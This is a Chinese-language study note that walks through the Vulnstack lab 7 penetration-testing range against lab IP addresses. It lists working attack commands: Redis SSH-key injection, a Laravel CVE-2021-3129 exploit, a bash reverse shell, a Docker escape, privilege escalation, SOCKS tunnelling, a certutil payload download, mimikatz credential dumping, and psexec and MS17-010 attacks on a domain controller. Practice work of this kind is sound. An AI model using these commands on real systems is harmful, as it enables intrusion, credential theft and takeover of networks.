Vulnstack红日内网靶场(七)-学习过程笔记
字数 939 2025-08-11 17:39:49

Vulnstack红日内网靶场(七)渗透测试教学文档

一、靶场环境概述

1.1 网络拓扑

  • DMZ区:Ubuntu主机,运行Redis服务
  • 第二层网络:Ubuntu主机,运行Docker环境
  • 第三层网络:Windows PC2,运行通达OA系统

1.2 环境准备

  1. DMZ区启动Redis服务: 
    sudo redis-server /etc/redis.conf
  2. 第二层网络启动Docker: 
    sudo service docker start
sudo docker start 8e172820ac78
  3. 第三层网络启动通达OA: 
    C:\MYOA\bin\AutoConfig.exe

二、外网渗透

2.1 信息收集

  • 目标IP:192.168.0.127
  • 扫描命令: 
    nmap -p- -T4 -A -v 192.168.0.127
  • 开放端口:22(SSH)、80(HTTP)、81(HTTP)、6379(Redis)

2.2 Redis未授权访问利用

  1. 连接Redis: 
    redis-cli -h 192.168.0.127
  2. 写入SSH公钥: 
    ssh-keygen -t rsa
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > f.txt
cat f.txt | redis-cli -h 192.168.0.127 -p 6379 -x set hello
config set dir /root/.ssh
config set dbfilename authorized_keys
  3. 通过SSH连接: 
    ssh root@192.168.0.127

2.3 Laravel框架漏洞利用

  1. 使用漏洞利用工具: 
    python laravel-CVE-2021-3129-EXP.py http://192.168.0.127:81
  2. 使用哥斯拉连接Webshell

三、内网横向移动

3.1 Docker环境突破

  1. 反弹Shell到Kali: 
    bash -c 'exec bash -i &>/dev/tcp/192.168.52.10/1237 <&1'
  2. 特权模式逃逸: 
    mkdir f
mount /dev/sda1 f
  3. 写入SSH公钥: 
    echo '公钥内容' > /f/home/ubuntu/.ssh/authorized_keys
ssh -i f ubuntu@192.168.52.20

3.2 提权操作

  1. SUID提权: 
    find / -perm -u=s -type f 2>/dev/null
  2. 环境变量劫持: 
    cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
export PATH=/tmp:$PATH
  3. 内核提权(CVE-2021-3493): 
    gcc exploit.c -o exploit
chmod +x exploit
./exploit

四、域渗透

4.1 MSF路由设置

run get_local_subnets
run autoroute -s 192.168.52.0 -n 255.255.255.0
run autoroute -p

4.2 SOCKS5隧道搭建

  1. Kali监听: 
    ./ew_for_linux64 -s rcsocks -l 1080 -e 1234
  2. 目标机连接: 
    nohup ./ew_for_linux64 -s rssocks -d 192.168.0.136 -e 1234 &

4.3 通达OA漏洞利用

  1. 漏洞版本:V11.3
  2. 利用文件包含漏洞获取Shell
  3. 文件下载执行: 
    certutil.exe -urlcache -split -f http://192.168.52.10:1009/win7_9091.exe

4.4 凭证获取

migrate <进程号>
load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords

获取凭证:

  • 域用户:bunny/Bunny2021
  • 域管理员:administrator/Whoami2021

五、域控攻击

5.1 关闭防火墙

net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall

5.2 psexec攻击

use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set lport 9999
set SMBUser administrator
set SMBPass Whoami2021
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
run

5.3 永恒之蓝攻击

对192.168.93.40使用MS17-010漏洞攻击

六、工具列表

  1. Redis未授权访问利用:原生redis-cli
  2. Laravel漏洞利用:laravel-CVE-2021-3129-EXP
  3. Webshell管理:哥斯拉v2.92
  4. 隧道工具:EarthWorm(ew)
  5. 提权利用:CVE-2021-3493 exploit
  6. 扫描工具:Nmap、MSF

七、关键知识点总结

  1. Redis未授权访问的利用方法
  2. Docker特权模式逃逸技术
  3. 环境变量劫持提权
  4. 内网穿透与路由设置
  5. 域环境下的凭证获取方法
  6. 多层网络环境下的渗透路径规划
  7. 防火墙绕过技术
  8. 多种横向移动方法对比选择
Vulnstack红日内网靶场(七)渗透测试教学文档 一、靶场环境概述 1.1 网络拓扑 DMZ区 :Ubuntu主机,运行Redis服务 第二层网络 :Ubuntu主机,运行Docker环境 第三层网络 :Windows PC2,运行通达OA系统 1.2 环境准备 DMZ区启动Redis服务: 第二层网络启动Docker: 第三层网络启动通达OA: 二、外网渗透 2.1 信息收集 目标IP:192.168.0.127 扫描命令: 开放端口:22(SSH)、80(HTTP)、81(HTTP)、6379(Redis) 2.2 Redis未授权访问利用 连接Redis: 写入SSH公钥: 通过SSH连接: 2.3 Laravel框架漏洞利用 使用漏洞利用工具: 使用哥斯拉连接Webshell 三、内网横向移动 3.1 Docker环境突破 反弹Shell到Kali: 特权模式逃逸: 写入SSH公钥: 3.2 提权操作 SUID提权: 环境变量劫持: 内核提权(CVE-2021-3493): 四、域渗透 4.1 MSF路由设置 4.2 SOCKS5隧道搭建 Kali监听: 目标机连接: 4.3 通达OA漏洞利用 漏洞版本:V11.3 利用文件包含漏洞获取Shell 文件下载执行: 4.4 凭证获取 获取凭证: 域用户:bunny/Bunny2021 域管理员:administrator/Whoami2021 五、域控攻击 5.1 关闭防火墙 5.2 psexec攻击 5.3 永恒之蓝攻击 对192.168.93.40使用MS17-010漏洞攻击 六、工具列表 Redis未授权访问利用:原生redis-cli Laravel漏洞利用:laravel-CVE-2021-3129-EXP Webshell管理:哥斯拉v2.92 隧道工具:EarthWorm(ew) 提权利用:CVE-2021-3493 exploit 扫描工具:Nmap、MSF 七、关键知识点总结 Redis未授权访问的利用方法 Docker特权模式逃逸技术 环境变量劫持提权 内网穿透与路由设置 域环境下的凭证获取方法 多层网络环境下的渗透路径规划 防火墙绕过技术 多种横向移动方法对比选择